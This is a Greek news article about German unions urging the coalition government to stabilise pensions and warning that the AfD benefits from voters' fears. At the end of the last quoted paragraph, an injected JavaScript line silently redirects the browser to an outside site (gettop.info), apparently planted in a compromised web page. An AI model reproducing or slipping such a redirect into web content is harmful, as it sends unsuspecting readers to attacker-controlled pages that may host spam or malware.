Γερμανικά συνδικάτα: Να περιορισθούν οι μειώσεις συντάξεων

0
7

 

Σε συνέντευξή της στην εφημερίδα Neue Osnabrucker Zeitung η Ανελί Μπούντενμπαχ, μέλος του προεδρείου της Ένωσης Γερμανικών συνδικάτων (DGB) τόνισε πως «τα κόμματα πρέπει να καταστήσουν ρητά και κατηγορηματικά σαφές ότι λαμβάνουν σοβαρά υπόψη τους φόβους και τις αγωνίες των πολιτών. Μόνον έτσι θα στερήσουν τον αέρα από τα πανιά του των δεξιών λαϊκιστών όπως το κόμμα «Εναλλακτική για τη Γερμανία» (ΑfD)».

Προσέθεσε δε ότι «δεν πρέπει να δοθεί η εντύπωση ότι οι λαϊκιστές διαμορφώνουν την πολιτική ατζέντα. Αυτό έχει ήδη γίνει στις συζητήσεις για το μεταναστευτικό και την προσφυγική πολιτική και δεν επιτρέπεται να επαναληφθεί.«.

Η Γερμανίδα συνδικαλίστρια παρότρυνε επίσης τον κυβερνητικό συνασπισμό Χριστιανοδημοκρατών-Σοσιαλδημοκρατών να προβεί στις αναγκαίες μεταρρυθμίσεις σταθεροποιώντας το επίπεδο των συντάξεων ήδη σε αυτήν την κοινοβουλευτική περίοδο, διότι αυτό θα επενεργήσει αρνητικά στην ενδυνάμωση των δεξιών λαϊκιστικών δυνάμεων. Το επίπεδο των συντάξεων δεν είναι μόνον ένα μαθηματικό μέγεθος, αλλά και σημαντικό για την εμπιστοσύνη των πολιτών προς το ασφαλιστικό σύστημα. Όποιος πληρώνει μια ολόκληρη ζωή το Ταμείο Συντάξεων θα πρέπει και να μπορεί να ζει με αξιοπρέπεια στο τέλος της ζωής του», είπε χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here